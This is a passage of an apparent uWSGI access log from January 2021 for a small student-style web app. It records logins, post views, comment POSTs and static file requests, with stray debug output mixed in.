-1/3729] 219.228.146.176 () {40 vars in 825 bytes} [Fri Jan 15 00:16:48 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 4 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3730] 219.228.146.176 () {40 vars in 821 bytes} [Fri Jan 15 00:16:48 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3731] 219.228.146.176 () {40 vars in 823 bytes} [Fri Jan 15 00:16:48 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3732] 219.228.146.176 () {40 vars in 843 bytes} [Fri Jan 15 00:16:48 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 4 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3733] 219.228.146.176 () {40 vars in 818 bytes} [Fri Jan 15 00:16:48 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3734] 219.228.146.176 () {40 vars in 802 bytes} [Fri Jan 15 00:16:48 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3735] 219.228.146.176 () {40 vars in 829 bytes} [Fri Jan 15 00:16:49 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3736] 219.228.146.176 () {40 vars in 804 bytes} [Fri Jan 15 00:16:49 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3737] 219.228.146.176 () {40 vars in 810 bytes} [Fri Jan 15 00:16:49 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3738] 219.228.146.176 () {40 vars in 820 bytes} [Fri Jan 15 00:16:49 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3739] 219.228.146.176 () {40 vars in 850 bytes} [Fri Jan 15 00:16:49 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 2 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3740] 219.228.146.176 () {40 vars in 856 bytes} [Fri Jan 15 00:16:49 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2737/3741] 219.228.146.176 () {50 vars in 995 bytes} [Fri Jan 15 00:17:16 2021] POST /login/ => generated 27 bytes in 40 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2738/3742] 219.228.146.176 () {40 vars in 806 bytes} [Fri Jan 15 00:17:16 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2739/3743] 219.228.146.176 () {40 vars in 808 bytes} [Fri Jan 15 00:17:16 2021] GET /home/ => generated 11128 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3744] 219.228.146.176 () {40 vars in 865 bytes} [Fri Jan 15 00:17:16 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 3 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3745] 219.228.146.176 () {40 vars in 861 bytes} [Fri Jan 15 00:17:16 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3746] 219.228.146.176 () {40 vars in 859 bytes} [Fri Jan 15 00:17:16 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 3 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2740/3747] 219.228.146.176 () {40 vars in 811 bytes} [Fri Jan 15 00:17:28 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2741/3748] 219.228.146.176 () {40 vars in 813 bytes} [Fri Jan 15 00:17:28 2021] GET /publish/ => generated 5325 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2742/3749] 219.228.146.176 () {40 vars in 808 bytes} [Fri Jan 15 00:17:31 2021] GET /home/ => generated 11128 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2743/3750] 219.228.146.176 () {40 vars in 829 bytes} [Fri Jan 15 00:17:32 2021] GET /ownpublish-0-0-0 => generated 10086 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3751] 219.228.146.176 () {40 vars in 828 bytes} [Fri Jan 15 00:17:32 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3752] 219.228.146.176 () {40 vars in 826 bytes} [Fri Jan 15 00:17:32 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2744/3753] 219.228.146.176 () {40 vars in 826 bytes} [Fri Jan 15 00:17:40 2021] GET /all-0-0-0 => generated 13501 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3754] 219.228.146.176 () {40 vars in 861 bytes} [Fri Jan 15 00:17:40 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 1 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3755] 219.228.146.176 () {40 vars in 893 bytes} [Fri Jan 15 00:17:40 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3756] 219.228.146.176 () {38 vars in 808 bytes} [Fri Jan 15 00:17:40 2021] GET /static/img/t_photo/16_OIP.jpg => generated 9197 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2745/3757] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 00:17:46 2021] GET /single/16 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2746/3758] 219.228.146.176 () {40 vars in 821 bytes} [Fri Jan 15 00:17:46 2021] GET /single/16/ => generated 9424 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2747/3759] 219.228.146.176 () {46 vars in 961 bytes} [Fri Jan 15 00:17:53 2021] POST /single/16/ => generated 0 bytes in 26 msecs (HTTP/1.1 302) 7 headers in 203 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2748/3760] 219.228.146.176 () {42 vars in 851 bytes} [Fri Jan 15 00:17:53 2021] GET /single/16 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2749/3761] 219.228.146.176 () {42 vars in 853 bytes} [Fri Jan 15 00:17:54 2021] GET /single/16/ => generated 9969 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3762] 219.228.146.176 () {40 vars in 864 bytes} [Fri Jan 15 00:17:54 2021] GET /static/img/t_photo/hungry.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2750/3763] 219.228.146.176 () {50 vars in 1007 bytes} [Fri Jan 15 00:17:57 2021] POST /single/16/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 179 bytes (2 switches on core 0) +[pid: 15176|app: 0|req: 2751/3764] 219.228.146.176 () {40 vars in 822 bytes} [Fri Jan 15 00:17:57 2021] GET /single/16/ => generated 9424 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2752/3765] 219.228.146.176 () {40 vars in 826 bytes} [Fri Jan 15 00:18:03 2021] GET /all-0-0-0 => generated 13501 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2753/3766] 219.228.146.176 () {40 vars in 817 bytes} [Fri Jan 15 00:18:06 2021] GET /single/1 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2754/3767] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 00:18:06 2021] GET /single/1/ => generated 9463 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2755/3768] 219.228.146.176 () {46 vars in 958 bytes} [Fri Jan 15 00:18:38 2021] POST /single/1/ => generated 0 bytes in 24 msecs (HTTP/1.1 302) 7 headers in 202 bytes (2 switches on core 0) +[pid: 15176|app: 0|req: 2756/3769] 219.228.146.176 () {42 vars in 848 bytes} [Fri Jan 15 00:18:38 2021] GET /single/1 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2757/3770] 219.228.146.176 () {42 vars in 850 bytes} [Fri Jan 15 00:18:38 2021] GET /single/1/ => generated 10029 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2758/3771] 219.228.146.176 () {40 vars in 811 bytes} [Fri Jan 15 00:18:44 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2759/3772] 219.228.146.176 () {40 vars in 813 bytes} [Fri Jan 15 00:18:44 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2760/3773] 219.228.146.176 () {50 vars in 995 bytes} [Fri Jan 15 00:18:55 2021] POST /login/ => generated 27 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2761/3774] 219.228.146.176 () {40 vars in 806 bytes} [Fri Jan 15 00:18:55 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2762/3775] 219.228.146.176 () {40 vars in 808 bytes} [Fri Jan 15 00:18:55 2021] GET /home/ => generated 11126 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2763/3776] 219.228.146.176 () {40 vars in 815 bytes} [Fri Jan 15 00:18:58 2021] GET /all-0-0-0 => generated 13499 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2764/3777] 219.228.146.176 () {40 vars in 817 bytes} [Fri Jan 15 00:19:00 2021] GET /single/1 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2765/3778] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 00:19:00 2021] GET /single/1/ => generated 10025 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2766/3779] 219.228.146.176 () {50 vars in 1004 bytes} [Fri Jan 15 00:19:03 2021] POST /single/1/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2767/3780] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 00:19:03 2021] GET /single/1/ => generated 9461 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2768/3781] 219.228.146.176 () {40 vars in 811 bytes} [Fri Jan 15 00:19:10 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2769/3782] 219.228.146.176 () {40 vars in 813 bytes} [Fri Jan 15 00:19:10 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3783] 219.228.146.195 () {40 vars in 886 bytes} [Fri Jan 15 00:30:52 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3784] 219.228.146.195 () {40 vars in 864 bytes} [Fri Jan 15 00:30:52 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3785] 219.228.146.195 () {40 vars in 866 bytes} [Fri Jan 15 00:30:52 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3786] 219.228.146.195 () {40 vars in 872 bytes} [Fri Jan 15 00:30:52 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3787] 219.228.146.195 () {40 vars in 868 bytes} [Fri Jan 15 00:30:52 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3788] 219.228.146.195 () {40 vars in 847 bytes} [Fri Jan 15 00:30:52 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3789] 219.228.146.195 () {40 vars in 845 bytes} [Fri Jan 15 00:30:52 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3790] 219.228.146.195 () {40 vars in 863 bytes} [Fri Jan 15 00:30:52 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3791] 219.228.146.195 () {40 vars in 853 bytes} [Fri Jan 15 00:30:52 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3792] 219.228.146.195 () {40 vars in 861 bytes} [Fri Jan 15 00:30:52 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3793] 219.228.146.195 () {40 vars in 901 bytes} [Fri Jan 15 00:30:52 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3794] 219.228.146.195 () {40 vars in 897 bytes} [Fri Jan 15 00:30:52 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3795] 219.228.146.195 () {40 vars in 908 bytes} [Fri Jan 15 00:30:52 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3796] 219.228.146.195 () {40 vars in 895 bytes} [Fri Jan 15 00:30:52 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3797] 219.228.146.195 () {40 vars in 914 bytes} [Fri Jan 15 00:30:55 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2770/3798] 219.228.146.195 () {40 vars in 934 bytes} [Fri Jan 15 00:31:03 2021] GET /ownpublish-0-0-0 => generated 10092 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3799] 219.228.146.195 () {40 vars in 872 bytes} [Fri Jan 15 00:31:03 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3800] 219.228.146.195 () {40 vars in 870 bytes} [Fri Jan 15 00:31:03 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2771/3801] 219.228.146.195 () {40 vars in 931 bytes} [Fri Jan 15 00:31:06 2021] GET /all-0-0-0 => generated 13507 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3802] 219.228.146.195 () {40 vars in 897 bytes} [Fri Jan 15 00:31:06 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3803] 219.228.146.195 () {40 vars in 929 bytes} [Fri Jan 15 00:31:06 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3804] 219.228.146.195 () {40 vars in 899 bytes} [Fri Jan 15 00:31:06 2021] GET /static/img/t_photo/16_OIP.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +Not Found: / +[pid: 15176|app: 0|req: 2772/3805] 83.97.20.29 () {26 vars in 279 bytes} [Fri Jan 15 00:31:07 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2773/3806] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:32:02 2021] GET /single/2/ => generated 9570 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2774/3807] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:32:07 2021] GET /single/4/ => generated 9996 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3808] 219.228.146.195 () {40 vars in 899 bytes} [Fri Jan 15 00:32:07 2021] GET /static/img/t_photo/hungry.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2775/3809] 219.228.146.195 () {48 vars in 1018 bytes} [Fri Jan 15 00:32:11 2021] POST /single/4/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2776/3810] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:32:11 2021] GET /single/4/ => generated 9448 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2777/3811] 219.228.146.195 () {48 vars in 1104 bytes} [Fri Jan 15 00:32:34 2021] POST /single/4/ => generated 0 bytes in 59 msecs (HTTP/1.1 302) 7 headers in 202 bytes (5 switches on core 0) +[pid: 15176|app: 0|req: 2778/3812] 219.228.146.195 () {42 vars in 953 bytes} [Fri Jan 15 00:32:35 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2779/3813] 219.228.146.195 () {42 vars in 955 bytes} [Fri Jan 15 00:32:35 2021] GET /single/4/ => generated 10019 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3814] 219.228.146.195 () {38 vars in 854 bytes} [Fri Jan 15 00:32:35 2021] GET /static/img/r_photo/37_seeseeme.png => generated 7285 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2780/3815] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:32:45 2021] GET /all-0-0-0 => generated 13507 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2781/3816] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:32:47 2021] GET /all-0-0-0 => generated 13507 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +0 +[] +[pid: 15176|app: 0|req: 2782/3817] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:32:48 2021] GET /all-4-0-0 => generated 10246 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +0 +0 +[, ] +[pid: 15176|app: 0|req: 2783/3818] 219.228.146.195 () {40 vars in 923 bytes} [Fri Jan 15 00:32:49 2021] GET /all-5-0-0 => generated 10682 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +0 +[] +[pid: 15176|app: 0|req: 2784/3819] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:32:51 2021] GET /all-6-0-0 => generated 10246 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +0 +0 +[, ] +[pid: 15176|app: 0|req: 2785/3820] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:32:52 2021] GET /all-7-0-0 => generated 10664 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +0 +[] +[pid: 15176|app: 0|req: 2786/3821] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:32:53 2021] GET /all-8-0-0 => generated 10267 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +0 +[] +[pid: 15176|app: 0|req: 2787/3822] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:32:54 2021] GET /all-9-0-0 => generated 10271 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[] +[pid: 15176|app: 0|req: 2788/3823] 219.228.146.195 () {40 vars in 926 bytes} [Fri Jan 15 00:32:55 2021] GET /all-10-0-0 => generated 9862 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +0 +[] +[pid: 15176|app: 0|req: 2789/3824] 219.228.146.195 () {40 vars in 925 bytes} [Fri Jan 15 00:32:57 2021] GET /all-3-0-0 => generated 10249 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2790/3825] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:32:59 2021] GET /all-0-0-0 => generated 13507 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2791/3826] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:33:01 2021] GET /single/4/ => generated 10019 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3827] 219.228.146.195 () {40 vars in 909 bytes} [Fri Jan 15 00:33:01 2021] GET /static/img/r_photo/37_seeseeme.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +here +[pid: 15176|app: 0|req: 2792/3828] 219.228.146.195 () {48 vars in 1018 bytes} [Fri Jan 15 00:33:03 2021] POST /single/4/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2793/3829] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:33:03 2021] GET /single/4/ => generated 10019 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +0 +[] +[pid: 15176|app: 0|req: 2794/3830] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:49:19 2021] GET /all-9-0-0 => generated 10271 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +0 +[] +[pid: 15176|app: 0|req: 2795/3831] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:49:21 2021] GET /all-8-0-0 => generated 10267 bytes in 59 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 15176|app: 0|req: 2796/3832] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:49:22 2021] GET /all-7-0-0 => generated 10664 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +0 +[] +[pid: 15176|app: 0|req: 2797/3833] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:49:24 2021] GET /all-6-0-0 => generated 10246 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 15176|app: 0|req: 2798/3834] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:49:24 2021] GET /all-5-0-0 => generated 10682 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2799/3835] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 00:49:27 2021] GET /all-0-0-0 => generated 13507 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2800/3836] 219.228.146.195 () {40 vars in 926 bytes} [Fri Jan 15 00:49:32 2021] GET /single/10/ => generated 10059 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2801/3837] 219.228.146.195 () {48 vars in 1021 bytes} [Fri Jan 15 00:49:41 2021] POST /single/10/ => generated 27 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2802/3838] 219.228.146.195 () {40 vars in 927 bytes} [Fri Jan 15 00:49:41 2021] GET /single/10/ => generated 9491 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2803/3839] 219.228.146.195 () {40 vars in 922 bytes} [Fri Jan 15 01:00:51 2021] GET /publish/ => generated 5325 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +不要熬夜 珍惜生命,不要熬夜 +[pid: 15176|app: 0|req: 2804/3840] 219.228.146.195 () {48 vars in 1102 bytes} [Fri Jan 15 01:01:23 2021] POST /publish/ => generated 0 bytes in 53 msecs (HTTP/1.1 302) 7 headers in 203 bytes (9 switches on core 0) +[pid: 15176|app: 0|req: 2805/3841] 219.228.146.195 () {42 vars in 954 bytes} [Fri Jan 15 01:01:23 2021] GET /single/18 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2806/3842] 219.228.146.195 () {42 vars in 956 bytes} [Fri Jan 15 01:01:23 2021] GET /single/18/ => generated 9405 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3843] 219.228.146.195 () {38 vars in 875 bytes} [Fri Jan 15 01:01:23 2021] GET /static/img/t_photo/18_%E4%B8%8D%E7%86%AC%E5%A4%9C.jpg => generated 16999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2807/3844] 219.228.146.195 () {40 vars in 922 bytes} [Fri Jan 15 01:01:31 2021] GET /publish/ => generated 5325 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2808/3845] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 01:01:36 2021] GET 